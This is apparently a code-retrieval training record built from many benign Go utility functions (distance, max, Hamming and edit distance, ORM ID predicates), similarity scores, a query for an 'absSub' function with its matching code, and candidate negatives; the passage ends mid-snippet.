digTurnDist(p1, p2 Coord) int {\n return int(math.Ceil(float64(digDist(p1, p2)) / MOVE_DIST))\n}", "func Max(x, y int32) int32 {\n\treturn x - (((x - y) >> 31) & (x - y))\n}", "func Distance(x, y, x2, y2 int32) int32 {\n\n\tdx := x - x2\n\tdy := y - y2\n\tds := (dx * dx) + (dy * dy)\n\treturn int32(math.Sqrt(math.Abs(float64(ds))))\n\n}", "func IDLTE(id int) predicate.AllocationStrategy {\n\treturn predicate.AllocationStrategy(func(s *sql.Selector) {\n\t\ts.Where(sql.LTE(s.C(FieldID), id))\n\t})\n}", "func Max(a uint64, b uint64) uint64 {\n\tif a > b {\n\t\treturn a\n\t}\n\treturn b\n}", "func IDLTE(id int) predicate.BaselineMeasureDenom {\n\treturn predicate.BaselineMeasureDenom(func(s *sql.Selector) {\n\t\ts.Where(sql.LTE(s.C(FieldID), id))\n\t})\n}", "func do(ds []int64, maxDistance int64) int64 {\n var count int64 = 0\n\n var i int64 = 0\n var j int64 = 2\n for i = 0; i < int64(len(ds)); i++ {\n for j < int64(len(ds)) && ds[j] - ds[i] <= maxDistance {\n j++\n }\n\n if j - 1 - i >= 2 {\n count += (j - i - 1) * (j - i - 2) / 2\n }\n }\n\n return count\n}", "func compareDistance(d1, d2 Distance) int {\n\tfor i := 0; i < MaxCapacity; i++ {\n\t\tif d1[i] > d2[i] {\n\t\t\treturn 1\n\t\t}\n\n\t\tif d1[i] < d2[i] {\n\t\t\treturn -1\n\t\t}\n\t}\n\n\treturn 0\n}", "func getDistance(x1 float64, y1 float64, x2 float64, y2 float64) float64 {\n\treturn math.Sqrt(math.Pow(x1-x2, 2) + math.Pow(y1-y2, 2))\n}", "func (id ID) SortByDistance(ids []ID) []ID {\n\tidsCopy := make([]ID, len(ids))\n\tcopy(idsCopy, ids)\n\tbdtc := &byDistanceToCenter{\n\t\tCenter: id,\n\t\tIds: idsCopy,\n\t}\n\tsort.Sort(bdtc)\n\treturn bdtc.Ids\n}", "func distance(a, b *Vertex) float64 {\n\treturn math.Sqrt(math.Pow(b.X-a.X, 2) + math.Pow(b.Y-a.Y, 2))\n}", "func (m match) dist() uint32 {\n\treturn uint32(m.distance - minDistance)\n}", "func IDLTE(id int) predicate.GroupBandwidth {\n\treturn predicate.GroupBandwidth(func(s *sql.Selector) {\n\t\ts.Where(sql.LTE(s.C(FieldID), id))\n\t})\n}", "func Distance(a, b string) (int, error) {\n\tif len(a) != len(b) {\n\t\treturn -1, errors.New(\"a and b should be of equal length\")\n\t}\n\n\thammingDistance := 0\n\tfor i := 0; i < len(a); i++ {\n\t\tif a[i] != b[i] {\n\t\t\thammingDistance++\n\t\t}\n\t}\n\n\treturn hammingDistance, nil\n}", "func (c Cell) MaxDistance(target Point) s1.ChordAngle {\n\t// First check the 4 cell vertices. If all are within the hemisphere\n\t// centered around target, the max distance will be to one of these vertices.\n\ttargetUVW := faceXYZtoUVW(int(c.face), target)\n\tmaxDist := maxChordAngle(c.vertexChordDist2(targetUVW, false, false),\n\t\tc.vertexChordDist2(targetUVW, true, false),\n\t\tc.vertexChordDist2(targetUVW, false, true),\n\t\tc.vertexChordDist2(targetUVW, true, true))\n\n\tif maxDist <= s1.RightChordAngle {\n\t\treturn maxDist\n\t}\n\n\t// Otherwise, find the minimum distance dMin to the antipodal point and the\n\t// maximum distance will be pi - dMin.\n\treturn s1.StraightChordAngle - c.Distance(Point{target.Mul(-1)})\n}", "func WrapMinDist(ci, max, ctr float32) float32 {\n\tnwd := mat32.Abs(ci - ctr) // no-wrap dist\n\tif mat32.Abs((ci+max)-ctr) < nwd {\n\t\treturn ci + max\n\t}\n\tif mat32.Abs((ci-max)-ctr) < nwd {\n\t\treturn ci - max\n\t}\n\treturn ci\n}", "func MaxDistance(steps []string) int {\n\tvar max int\n\tvar path []string\n\tfor _, s := range steps {\n\t\tpath = addStep(path, s)\n\t\tif max < len(path) {\n\t\t\tmax = len(path)\n\t\t}\n\t}\n\treturn max\n}", "func IDLTE(id int) predicate.ResultsDefinition {\n\treturn predicate.ResultsDefinition(func(s *sql.Selector) {\n\t\ts.Where(sql.LTE(s.C(FieldID), id))\n\t})\n}", "func max(a, b int64) int64 {\n\tif a > b {\n\t\treturn a\n\t}\n\treturn b\n}", "func max(a, b int64) int64 {\n\tif a > b {\n\t\treturn a\n\t}\n\treturn b\n}", "func IDLTE(id int) predicate.Manner {\n\treturn predicate.Manner(func(s *sql.Selector) {\n\t\ts.Where(sql.LTE(s.C(FieldID), id))\n\t})\n}", "func Distance(a, b Point) float64 {\n\tcx, cy := cathetus(a, b)\n\treturn math.Sqrt(math.Pow(cx, 2) + math.Pow(cy, 2))\n}", "func Distance(a, b string) (int, error) {\n\tif len(a) != len(b) {\n\t\treturn 0, errors.New(\"hamming distance is only defined for sequences of equal length\")\n\t}\n\n\td := 0\n\tfor i, _ := range a {\n\t\tif a[i] != b[i] {\n\t\t\td += 1\n\t\t}\n\t}\n\n\treturn d, nil\n}", "func distance(xa, ya, xb, yb int) float64 {\n\tx := math.Abs(float64(xa - xb))\n\ty := math.Abs(float64(ya - yb))\n\treturn math.Sqrt(x*x + y*y)\n}", "func distance(x0, x1, y0, y1 int) float64 {\n\tdistance := math.Sqrt(math.Pow(float64(x1-x0), 2) + math.Pow(float64(y1-y0), 2))\n\treturn distance\n}", "func Dist(c1, c2 Placed) int {\n\t// Apparently FPUs make casting fast. I hope so…\n\tx1, y1 := CoordsToFloat(c1.GetXY())\n\tx2, y2 := CoordsToFloat(c2.GetXY())\n\treturn int(math.Sqrt(math.Pow(x2-x1, 2) + math.Pow(y2-y1, 2)))\n}", "func turnDist(p1, p2 Coord) int {\n return int(math.Ceil(float64(dist(p1, p2)) / MOVE_DIST))\n}", "func distance(a, b mgl64.Vec3) float64 {\n\txDiff, yDiff, zDiff := b[0]-a[0], b[1]-a[1], b[2]-a[2]\n\treturn math.Sqrt(xDiff*xDiff + yDiff*yDiff + zDiff*zDiff)\n}", "func minDistance(word1 string, word2 string) int {\n\tn1, n2 := len(word1), len(word2)\n\n\t// dp[i][j] == k 表示 word1[:i] 和 word2[:j] 的最大公共子序列的长度为 k\n\tdp := make([][]int, n1+1)\n\tfor i := range dp {\n\t\tdp[i] = make([]int, n2+1)\n\t}\n\tmax := func(a, b int) int {\n\t\tif a > b {\n\t\t\treturn a\n\t\t}\n\t\treturn b\n\t}\n\tfor i := 1; i <= n1; i++ {\n\t\tfor j := 1; j <= n2; j++ {\n\t\t\tdp[i][j] = max(dp[i-1][j], dp[i][j-1])\n\t\t\tif word1[i-1] == word2[j-1] {\n\t\t\t\tdp[i][j] = dp[i-1][j-1] + 1\n\t\t\t}\n\t\t}\n\t}\n\n\treturn n1 + n2 - dp[n1][n2]*2\n}", "func IDLTE(id int) predicate.Road {\n\treturn predicate.Road(func(s *sql.Selector) {\n\t\ts.Where(sql.LTE(s.C(FieldID), id))\n\t})\n}", "func IDLTE(id int) predicate.AppointmentResults {\n\treturn predicate.AppointmentResults(func(s *sql.Selector) {\n\t\ts.Where(sql.LTE(s.C(FieldID), id))\n\t})\n}", "func Max(x, y int64) int64 {\n\tif x > y {\n\t\treturn x\n\t}\n\treturn y\n}", "func nearWrap(a, b, width float64) float64 {\n\tif a < 0 || a >= width {\n\t\tpanic(\"geom.nearWrap: a is out of range\")\n\t}\n\n\tb = wrap(b, width)\n\tn := b\n\tif math.Abs(b+width-a) < math.Abs(n-a) {\n\t\tn = b + width\n\t}\n\tif math.Abs(b-width-a) < math.Abs(n-a) {\n\t\tn = b - width\n\t}\n\treturn n\n}", "func IDLTE(id int) predicate.Token {\n\treturn predicate.Token(func(s *sql.Selector) {\n\t\ts.Where(sql.LTE(s.C(FieldID), id))\n\t},\n\t)\n}", "func IDLTE(id int64) predicate.Order {\n\treturn predicate.Order(func(s *sql.Selector) {\n\t\ts.Where(sql.LTE(s.C(FieldID), id))\n\t})\n}", "func IDLTE(id string) predicate.Location {\n\treturn predicate.Location(func(s *sql.Selector) {\n\t\tid, _ := strconv.Atoi(id)\n\t\ts.Where(sql.LTE(s.C(FieldID), id))\n\t},\n\t)\n}", "func Int64Max(a, b int64) int64 {\n\tif a > b {\n\t\treturn a\n\t}\n\treturn b\n}", "func max(x, y int64) int64 {\n\tif x < y {\n\t\treturn y\n\t}\n\treturn x\n}", "func CompleteLink(a,b Cluster,distAlgo PointDistance)(float64){\n\tmax := float64(-1)\n\tfor _,aItem := range a.GetClusterItems(){\n\t\tfor _,bItem := range b.GetClusterItems(){\n\t\t\ttmp := distAlgo(aItem,bItem)\n\t\t\tif tmp > max {\n\t\t\t\tmax = tmp\n\t\t\t}\n\t\t}\n\t}\n\treturn max\n}", "func IDLTE(id int) predicate.Bulk {\n\treturn predicate.Bulk(func(s *sql.Selector) {\n\t\ts.Where(sql.LTE(s.C(FieldID), id))\n\t})\n}", "func distcmp(target, a, b common.Hash) int {\n\tfor i := range target {\n\t\tda := a[i] ^ target[i]\n\t\tdb := b[i] ^ target[i]\n\t\tif da > db {\n\t\t\treturn 1\n\t\t} else if da < db {\n\t\t\treturn -1\n\t\t}\n\t}\n\treturn 0\n}", "func Distance(a, b string) (int, error) {\n\tresult := 0\n\n\tif len(a) == len(b) {\n\t\tfor i := range a {\n\t\t\tif a[i] != b[i] {\n\t\t\t\tresult++\n\t\t\t}\n\t\t}\n\n\t\treturn result, nil\n\t}\n\n\treturn -1, errors.New(\"error raised\")\n}", "func getMaxID() int {\n\n\tif len(cdb.classMap) != 0 {\n\t\tkeys := make([]int, 0, len(cdb.classMap))\n\t\tfor k := range cdb.classMap {\n\t\t\tkeys = append(keys, k)\n\t\t}\n\t\tsort.Ints(keys)\n\t\treturn keys[len(keys)-1]\n\t}\n\n\treturn -1\n\n}", "func hammingDistance(x int, y int) int {\n\n}", "func Distance(a, b string) (int, error) {\n\n\tif len([]rune(a)) != len([]rune(b)) {\n\t\treturn 0, fmt.Errorf(\"%s and %s are of different length\", a, b)\n\t}\n\n\thammingDistance := 0\n\tfor i := 0; i < len([]rune(a)); i++ {\n\t\tif []rune(a)[i] != []rune(b)[i] {\n\t\t\thammingDistance++\n\t\t}\n\t}\n\treturn hammingDistance, nil\n}", "func IDLTE(id int) predicate.BaselineClass {\n\treturn predicate.BaselineClass(func(s *sql.Selector) {\n\t\ts.Where(sql.LTE(s.C(FieldID), id))\n\t})\n}", "func IDLTE(id int) predicate.Blob {\n\treturn predicate.Blob(\n\t\tfunc(s *sql.Selector) {\n\t\t\ts.Where(sql.LTE(s.C(FieldID), id))\n\t\t},\n\t)\n}", "func Max(a, b int) int {\n\tif a-b > 0 {\n\t\treturn a\n\t}\n\n\treturn b\n}", "func max(a, b int32) int32 {\n\tif a < b {\n\t\treturn b\n\t}\n\treturn a\n}", "func IDLTE(id int) predicate.Conversion {\n\treturn predicate.Conversion(func(s *sql.Selector) {\n\t\ts.Where(sql.LTE(s.C(FieldID), id))\n\t})\n}", "func Max(a, operand int) int {\n\tif a > operand {\n\t\treturn a\n\t}\n\treturn operand\n}", "func distcmp(target, a, b bgmcommon.Hash) int {\n\tfor i := range target {\n\t\tda := a[i] ^ target[i]\n\t\tdb := b[i] ^ target[i]\n\t\tif da > db {\n\t\t\treturn 1\n\t\t} else if da < db {\n\t\t\treturn -1\n\t\t}\n\t}\n\treturn 0\n}", "func IDLTE(id int) predicate.OrderItem {\n\treturn predicate.OrderItem(func(s *sql.Selector) {\n\t\ts.Where(sql.LTE(s.C(FieldID), id))\n\t})\n}", "func IDLTE(id int) predicate.GameServer {\n\treturn predicate.GameServer(func(s *sql.Selector) {\n\t\ts.Where(sql.LTE(s.C(FieldID), id))\n\t})\n}", "func withDistanceID(id int) distanceOption {\n\treturn func(m *DistanceMutation) {\n\t\tvar (\n\t\t\terr error\n\t\t\tonce sync.Once\n\t\t\tvalue *Distance\n\t\t)\n\t\tm.oldValue = func(ctx context.Context) (*Distance, error) {\n\t\t\tonce.Do(func() {\n\t\t\t\tif m.done {\n\t\t\t\t\terr = fmt.Errorf(\"querying old values post mutation is not allowed\")\n\t\t\t\t} else {\n\t\t\t\t\tvalue, err = m.Client().Distance.Get(ctx, id)\n\t\t\t\t}\n\t\t\t})\n\t\t\treturn value, err\n\t\t}\n\t\tm.id = &id\n\t}\n}", "func longestPossibleMatch(a, b int) (int, int) {\n\tif a > b {\n\t\treturn min(b, a-b), a\n\t}\n\treturn min(a, b-a), b\n}", "func Distance(a, b string) (int, error) {\n\tif len(a) != len(b) {\n\t\treturn -1, ErrDifferentParamLengths\n\t}\n\n\tdiff := 0\n\n\tfor i, _ := range a {\n\t\tif a[i] != b[i] {\n\t\t\tdiff++\n\t\t}\n\t}\n\n\treturn diff, nil\n}", "func Max(a, b int) int {\n\treturn int(math.Max(float64(a), float64(b)))\n}", "func (bids *Bids) getClosestMatch(a int, b int, price float64) int {\n\tif price-bids.ticks[a].Price >= bids.ticks[b].Price-price {\n\t\treturn b\n\t}\n\treturn a\n}", "func Distance(a, b Vector3) float32 {\n\treturn (Difference(a, b).Length())\n}", "func IDLTE(id int) predicate.Rent {\n\treturn predicate.Rent(func(s *sql.Selector) {\n\t\ts.Where(sql.LTE(s.C(FieldID), id))\n\t})\n}", "func IDLTE(id int) predicate.Post {\n\treturn predicate.Post(func(s *sql.Selector) {\n\t\ts.Where(sql.LTE(s.C(FieldID), id))\n\t})\n}", "func EuclidianDistance(a, b mat.Vector) float64 {\n\tvar total float64\n\tfor i := 0; i < a.Len(); i++ {\n\t\ttotal += math.Pow(a.AtVec(i)-b.AtVec(i), 2)\n\t}\n\treturn math.Sqrt(total)\n}", "func Max(a, b uint32) uint32 {\n\tif a > b {\n\t\treturn a\n\t}\n\treturn b\n}", "func IDLTE(id int) predicate.Location {\n\treturn predicate.Location(func(s *sql.Selector) {\n\t\ts.Where(sql.LTE(s.C(FieldID), id))\n\t})\n}", "func IDLTE(id int) predicate.Location {\n\treturn predicate.Location(func(s *sql.Selector) {\n\t\ts.Where(sql.LTE(s.C(FieldID), id))\n\t})\n}", "func Distance(a, b string) (int, error) {\n\tar, br := []rune(a), []rune(b)\n\n\tif len(ar) != len(br) {\n\t\treturn 0, errors.New(\"sequences are of unequal length\")\n\t}\n\n\thammingDistance := 0\n\tfor pos := range ar {\n\t\tif ar[pos] != br[pos] {\n\t\t\thammingDistance++\n\t\t}\n\t}\n\n\treturn hammingDistance, nil\n}", "func IDLTE(id string) predicate.Step {\n\treturn predicate.Step(func(s *sql.Selector) {\n\t\ts.Where(sql.LTE(s.C(FieldID), id))\n\t})\n}", "func max(a, b int32) int32 {\n\tif a >= b {\n\t\treturn a\n\t}\n\treturn b\n}", "func IDLTE(id int) predicate.CarRepairrecord {\n\treturn predicate.CarRepairrecord(func(s *sql.Selector) {\n\t\ts.Where(sql.LTE(s.C(FieldID), id))\n\t})\n}", "func Max(a, b int) int {\n\tif a < b {\n\t\treturn b\n\t}\n\treturn a\n}", "func Max(a, b int) int {\n\tif a < b {\n\t\treturn b\n\t}\n\treturn a\n}", "func (c Cell) MaxDistanceToCell(target Cell) s1.ChordAngle {\n\t// Need to check the antipodal target for intersection with the cell. If it\n\t// intersects, the distance is the straight ChordAngle.\n\t// antipodalUV is the transpose of the original UV, interpreted within the opposite face.\n\tantipodalUV := r2.Rect{target.uv.Y, target.uv.X}\n\tif int(c.face) == oppositeFace(int(target.face)) && c.uv.Intersects(antipodalUV) {\n\t\treturn s1.StraightChordAngle\n\t}\n\n\t// Otherwise, the maximum distance always occurs between a vertex of one\n\t// cell and an edge of the other cell (including the edge endpoints). This\n\t// represents a total of 32 possible (vertex, edge) pairs.\n\t//\n\t// TODO(roberts): When the maximum distance is at most π/2, the maximum is\n\t// always attained between a pair of vertices, and this could be made much\n\t// faster by testing each vertex pair once rather than the current 4 times.\n\tvar va, vb [4]Point\n\tfor i := 0; i < 4; i++ {\n\t\tva[i] = c.Vertex(i)\n\t\tvb[i] = target.Vertex(i)\n\t}\n\tmaxDist := s1.NegativeChordAngle\n\tfor i := 0; i < 4; i++ {\n\t\tfor j := 0; j < 4; j++ {\n\t\t\tmaxDist, _ = UpdateMaxDistance(va[i], vb[j], vb[(j+1)&3], maxDist)\n\t\t\tmaxDist, _ = UpdateMaxDistance(vb[i], va[j], va[(j+1)&3], maxDist)\n\t\t}\n\t}\n\treturn maxDist\n}", "func IDLTE(id int) predicate.Building {\n\treturn predicate.Building(func(s *sql.Selector) {\n\t\ts.Where(sql.LTE(s.C(FieldID), id))\n\t})\n}", "func IDLTE(id int) predicate.Patient {\n\treturn predicate.Patient(func(s *sql.Selector) {\n\t\ts.Where(sql.LTE(s.C(FieldID), id))\n\t})\n}", "func findRoutes(x int64, y int64) *big.Int {\n\troutes := big.NewInt(0)\n\troutes = routes.Mul(factorial(x), factorial(y))\n\treturn routes.Div(factorial(x+y), routes)\n}", "func IDLTE(id int) predicate.Task {\n\treturn predicate.Task(sql.FieldLTE(FieldID, id))\n}", "func distance(x1, y1, x2, y2 float64) float64 {\n\ta := x2 - x1\n\tb := y2 - y1\n\treturn math.Sqrt(a*a + b*b)\n}", "func Distance(a, b string) (int, error) {\n\n\tif len(a) != len(b) {\n\t\treturn 0, errors.New(\"invalid input\")\n\t}\n\n\tvar result int\n\tfor index := 0; index < len(a); index++ {\n\t\tif a[index] != b[index] {\n\t\t\tresult++\n\t\t}\n\t}\n\n\treturn result, nil\n}", "func IDLTE(id int) predicate.Property {\n\treturn predicate.Property(func(s *sql.Selector) {\n\t\ts.Where(sql.LTE(s.C(FieldID), id))\n\t})\n}", "func Distance(a, b string) (int, error) {\n\t// default distance to 0\n\tdistance := 0\n\t// default err as an error type set to nil\n\tvar err error = nil\n\n\t// convert to runes so that utf8 characters can be compared.\n\trunesA := []rune(a)\n\trunesB := []rune(b)\n\tfmt.Println(runesA, runesB)\n\t// if lengths dont match throw an error.\n\tif len(runesA) != len(runesB) {\n\t\terr = fmt.Errorf(\"Distance(%q, %q), string lengths are not equal so this is not a valid input for this function\", a, b)\n\t} else if a != b {\n\t\t// loop over the runes in runesA and compare the same index in runesB\n\t\t// if it does not match increment distance\n\t\tfor index, runeValueA := range runesA {\n\t\t\tif runeValueA != runesB[index] {\n\t\t\t\tdistance++\n\t\t\t}\n\t\t}\n\t}\n\n\treturn distance, err\n}", "func minimumDistances(a []int32) int32 {\n\tm := make(map[int32]int32)\n\tvar min int32 = 300000000\n\n\tfor i, v := range a {\n\t\tval, b := m[v]\n\t\tif b {\n\t\t\tt := val - int32(i)\n\t\t\tif min > int32(math.Abs(float64(t))) {\n\t\t\t\tmin = int32(math.Abs(float64(t)))\n\t\t\t}\n\t\t}\n\t\tm[v]=int32(i)\n\t}\n\tif min == 300000000 {\n\t\treturn int32(-1)\n\t}\n\n\treturn min\n\n}", "func (c Cell) MaxDistanceToEdge(a, b Point) s1.ChordAngle {\n\t// If the maximum distance from both endpoints to the cell is less than π/2\n\t// then the maximum distance from the edge to the cell is the maximum of the\n\t// two endpoint distances.\n\tmaxDist := maxChordAngle(c.MaxDistance(a), c.MaxDistance(b))\n\tif maxDist <= s1.RightChordAngle {\n\t\treturn maxDist\n\t}\n\n\treturn s1.StraightChordAngle - c.DistanceToEdge(Point{a.Mul(-1)}, Point{b.Mul(-1)})\n}", "func EditDist(a, b string) int {\n\tlen1, len2 := len(a), len(b)\n\tif len1 < len2 {\n\t\treturn EditDist(b, a)\n\t}\n\trow1, row2 := make([]int, len2+1), make([]int, len2+1)\n\n\tfor i := 0; i < len2+1; i++ {\n\t\trow2[i] = i\n\t}\n\n\tfor i := 0; i < len1; i++ {\n\t\trow1[0] = i + 1\n\n\t\tfor j := 0; j < len2; j++ {\n\t\t\tx := min(row2[j+1]+1, row1[j]+1)\n\t\t\ty := row2[j] + invBool2int(a[i] == b[j])\n\t\t\trow1[j+1] = min(x, y)\n\t\t}\n\n\t\trow1, row2 = row2, row1\n\t}\n\treturn row2[len2]\n}", "func IDLTE(id int) predicate.FlowInstance {\n\treturn predicate.FlowInstance(func(s *sql.Selector) {\n\t\ts.Where(sql.LTE(s.C(FieldID), id))\n\t})\n}", "func IDLTE(id int) predicate.Pet {\n\treturn predicate.Pet(sql.FieldLTE(FieldID, id))\n}", "func (c card) distance(d card) int {\n\tdist := d.number - c.number\n\tif dist < 0 {\n\t\tdist += 13\n\t}\n\treturn dist\n}", "func IDLTE(id int) predicate.DuplicateNumberMessage {\n\treturn predicate.DuplicateNumberMessage(func(s *sql.Selector) {\n\t\ts.Where(sql.LTE(s.C(FieldID), id))\n\t})\n}", "func Distance(a, b string) (int, error) {\n\t//length of the DNA strands must be same to calculate hamming distance.\n\tif len(a) != len(b) {\n\t\treturn -1, errors.New(\"length of string A and B should be the same to calculate hamming distance\")\n\t}\n\thammingDistance := 0\n\tfor i :=0; i<len(a) ;i++ {\n\t\tif a[i] != b[i] {\n\t\t\thammingDistance++\n\t\t}\n\t}\n\treturn hammingDistance, nil\n}" ]
[ "0.59706086", "0.5848006", "0.5799961", "0.5799961", "0.57304907", "0.5343803", "0.51886135", "0.5186379", "0.5079502", "0.50471145", "0.49845216", "0.4917509", "0.49031368", "0.490295", "0.487796", "0.4873442", "0.4847311", "0.4836192", "0.48251015", "0.48215413", "0.47918913", "0.47910377", "0.4787152", "0.47864354", "0.47798276", "0.47796187", "0.47776267", "0.47524193", "0.47480392", "0.47064707", "0.47064707", "0.47062534", "0.4702912", "0.47017983", "0.46999556", "0.46871677", "0.4654239", "0.4649207", "0.46449482", "0.46425575", "0.4639309", "0.4638156", "0.463186", "0.4630465", "0.46288854", "0.46196464", "0.46133998", "0.46104893", "0.46001986", "0.45857", "0.4585032", "0.45821792", "0.4576347", "0.45708835", "0.4563234", "0.4560327", "0.45554906", "0.45465255", "0.45456064", "0.45442715", "0.45432562", "0.45351323", "0.4535042", "0.45334044", "0.4530345", "0.45128253", "0.45091277", "0.45066786", "0.4505656", "0.4504805", "0.4504035", "0.4503494", "0.45031935", "0.450135", "0.4486825", "0.44851568", "0.44851568", "0.4485114", "0.447976", "0.44757262", "0.4466836", "0.44595924", "0.44595924", "0.44577888", "0.44498658", "0.44482613", "0.4445868", "0.44448268", "0.4437371", "0.44364867", "0.4434317", "0.44326797", "0.4431658", "0.4431028", "0.44255304", "0.442329", "0.4421823", "0.44209075", "0.442007", "0.441855" ]
0.8380889
0
absSub :: | a b |
func absSub(a, b id.ID) id.ID { cmp := id.Compare(a, b) switch { case cmp < 0: // a < b return idSub(b, a) case cmp == 0: // a == b return id.Zero case cmp > 0: // a > b return idSub(a, b) default: panic("impossible case") } }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (v Vec) AbsSub(other Vec) Vec {\n\treturn v.Copy().AbsSubBy(other)\n}", "func (a Vec2) Sub(b Vec2) Vec2 {\n\treturn Vec2{a.X - b.X, a.Y - b.Y}\n}", "func (t Torus) Sub(a, b Point) Point {\n\ta, b = t.normPair(a, b)\n\treturn a.Sub(b)\n}", "func (a ImpactAmount) sub(b ImpactAmount) ImpactAmount {\n\tif b >= a {\n\t\treturn 0\n\t}\n\treturn a - b\n}", "func Sub(a int, b int) int {\n\treturn a - b\n}", "func Sub(a int, b int) int {\n\treturn a - b\n}", "func Sub(a int, b int) int {\n\treturn a - b\n}", "func Sub(a, b int) int {\n\treturn a - b\n}", "func Sub(a, b int) int {\n\treturn a - b\n}", "func Sub(a, b int) int {\n\treturn a - b\n}", "func Modsub(a, b, m *ED25519.BIG) *ED25519.BIG {\n\treturn Modadd(a, ED25519.Modneg(b, m), m)\n}", "func Modsub(a, b, m *ED25519.BIG) *ED25519.BIG {\n\treturn Modadd(a, ED25519.Modneg(b, m), m)\n}", "func Modsub(a, b, m *ED25519.BIG) *ED25519.BIG {\n\treturn Modadd(a, ED25519.Modneg(b, m), m)\n}", "func (v1 Vector2) Sub(v2 Vector2) Vector2 {\n\treturn Vector2{v1.X - v2.X, v1.Y - v2.Y}\n}", "func Sub(z, x, y *Elt)", "func Sub(a, b Expr) Expr {\n\treturn &subOp{&simpleOperator{a, b, scanner.SUB}}\n}", "func Sub(v1, v2 *Vec) *Vec {\n\tnegV2 := Negate(v2)\n\treturn Add(v1, negV2)\n}", "func sub(x, y int) int {\n\treturn x - y\n}", "func (v Vec2) Sub(other Vec2) Vec2 {\n\treturn Vec2{v.X - other.X, v.Y - other.Y}\n}", "func gfSub(a, b gfElement) gfElement {\n\treturn a ^ b\n}", "func (z *Int) Sub(x, y *Int) *Int {}", "func Sub(a, b *big.Float) *big.Float {\n\treturn ZeroBigFloat().Sub(a, b)\n}", "func (z *Rat) Sub(x, y *Rat) *Rat {}", "func substract(a, b float64) float64 {\n\treturn a - b\n}", "func Sub(valueA gcv.Value, valueB gcv.Value) gcv.Value {\n\tif valueA.Type() == gcv.Complex || valueB.Type() == gcv.Complex {\n\t\treturn gcv.MakeValue(valueA.Complex() - valueB.Complex())\n\t}\n\treturn gcv.MakeValue(valueA.Real() - valueB.Real())\n}", "func approxSub(a, b float64) float64 {\n\tif ((a < 0 && b < 0) || (a > 0 && b > 0)) && math.Abs(a-b) < 2.22045e-016 {\n\t\treturn 0\n\t}\n\treturn a - b\n}", "func (v Vec2) Sub(x Vec2) Vec2 {\n\treturn Vec2{v[0] - x[0], v[1] - x[1]}\n}", "func Sub(x, y int) int {\n\treturn x - y\n}", "func sub(a, b big.Int) big.Int {\n\treturn *big.NewInt(1).Sub(&a, &b)\n}", "func (v Vec) AbsSubBy(other Vec) Vec {\n\tassertSameLen(v, other)\n\tfor i, val := range other {\n\t\tv[i] = math.Abs(v[i] - val)\n\t}\n\treturn v\n}", "func sub(x, y int) (answer int, err error) {\n\tanswer = x - y\n\treturn\n}", "func Sub(a, b Expr) Expr {\n\treturn &arithmeticOperator{&simpleOperator{a, b, scanner.SUB}}\n}", "func Sub(out1 *LooseFieldElement, arg1 *TightFieldElement, arg2 *TightFieldElement) {\n\tx1 := ((0x1ffffffffff6 + arg1[0]) - arg2[0])\n\tx2 := ((0xffffffffffe + arg1[1]) - arg2[1])\n\tx3 := ((0xffffffffffe + arg1[2]) - arg2[2])\n\tout1[0] = x1\n\tout1[1] = x2\n\tout1[2] = x3\n}", "func sub(a, b, carry int32) (diff int32, newCarry int32) {\n\tdiff = a - b - carry\n\tif diff < 0 {\n\t\tnewCarry = 1\n\t\tdiff += wordBase\n\t} else {\n\t\tnewCarry = 0\n\t}\n\treturn diff, newCarry\n}", "func Command_Sub(script *rex.Script, params []*rex.Value) {\n\tif len(params) != 2 {\n\t\trex.ErrorParamCount(\"float:sub\", \"2\")\n\t}\n\n\tscript.RetVal = rex.NewValueFloat64(params[0].Float64() - params[1].Float64())\n\treturn\n}", "func (c *Clac) Sub() error {\n\treturn c.applyFloat(2, func(vals []value.Value) (value.Value, error) {\n\t\treturn binary(vals[1], \"-\", vals[0])\n\t})\n}", "func (v1 Vec3) Sub(v2 Vec3) *Vec3 {\n\treturn &Vec3{e: [3]float32{v1.X() - v2.X(), v1.Y() - v2.Y(), v1.Z() - v2.Z()}}\n}", "func (n *bigNumber) sub(x *bigNumber, y *bigNumber) *bigNumber {\n\treturn n.subRaw(x, y).bias(2).weakReduce()\n}", "func Sub( a *context.Value, b *context.Value ) (*context.Value,error) {\n if a != nil && b != nil {\n switch a.OperationType( b ) {\n case context.VAR_BOOL:\n return context.IntValue( a.Int() - b.Int() ), nil\n case context.VAR_INT:\n return context.IntValue( a.Int() - b.Int() ), nil\n case context.VAR_FLOAT:\n return context.FloatValue( a.Float() - b.Float() ), nil\n case context.VAR_COMPLEX:\n return context.ComplexValue( a.Complex() - b.Complex() ), nil\n default:\n }\n }\n\n return nil, errors.New( \"Unsupported type for sub\" )\n}", "func (p *EdwardsPoint) Sub(a, b *EdwardsPoint) *EdwardsPoint {\n\tvar (\n\t\tbPNiels projectiveNielsPoint\n\t\tdiff completedPoint\n\t)\n\treturn p.setCompleted(diff.SubEdwardsProjectiveNiels(a, bPNiels.SetEdwards(b)))\n}", "func (p Point2) Sub(ps ...Point2) Point2 {\n\tfor _, p2 := range ps {\n\t\tp[0] -= p2[0]\n\t\tp[1] -= p2[1]\n\t}\n\treturn p\n}", "func Sub(minuend, subtrahend *big.Int) *big.Int { return I().Sub(minuend, subtrahend) }", "func sub(a, b Poly) Poly {\n\tvar c Poly\n\tfor i := 0; i < n; i++ {\n\t\tc[i] = a[i] - b[i]\n\t}\n\treturn c\n}", "func Sub(a int, b int) float32 {\n\treturn float32(a - b)\n}", "func (ec *ECPoint) Sub(first, second *ECPoint) *ECPoint {\n\tec.checkNil()\n\tif first.Equal(second) {\n\t\tec.X = big.NewInt(0)\n\t\tec.Y = big.NewInt(0)\n\t\tec.Curve = first.Curve\n\t\treturn ec\n\t}\n\tnegation := new(ECPoint).Negation(second)\n\tec.X, ec.Y = first.Curve.Add(negation.X, negation.Y, first.X, first.Y)\n\tec.Curve = first.Curve\n\n\treturn ec\n}", "func (p *Point) Sub(p2 Point) {\n\tp.X -= p2.X\n\tp.Y -= p2.Y\n\tp.Z -= p2.Z\n}", "func Sub(out1 *LooseFieldElement, arg1 *TightFieldElement, arg2 *TightFieldElement) {\n\tx1 := ((0x7fffff6 + arg1[0]) - arg2[0])\n\tx2 := ((0x7fffffe + arg1[1]) - arg2[1])\n\tx3 := ((0x7fffffe + arg1[2]) - arg2[2])\n\tx4 := ((0x7fffffe + arg1[3]) - arg2[3])\n\tx5 := ((0x7fffffe + arg1[4]) - arg2[4])\n\tout1[0] = x1\n\tout1[1] = x2\n\tout1[2] = x3\n\tout1[3] = x4\n\tout1[4] = x5\n}", "func (e *ConstantExpr) Sub(other *ConstantExpr) *ConstantExpr {\n\tassert(e.Width == other.Width, \"sub: width mismatch: 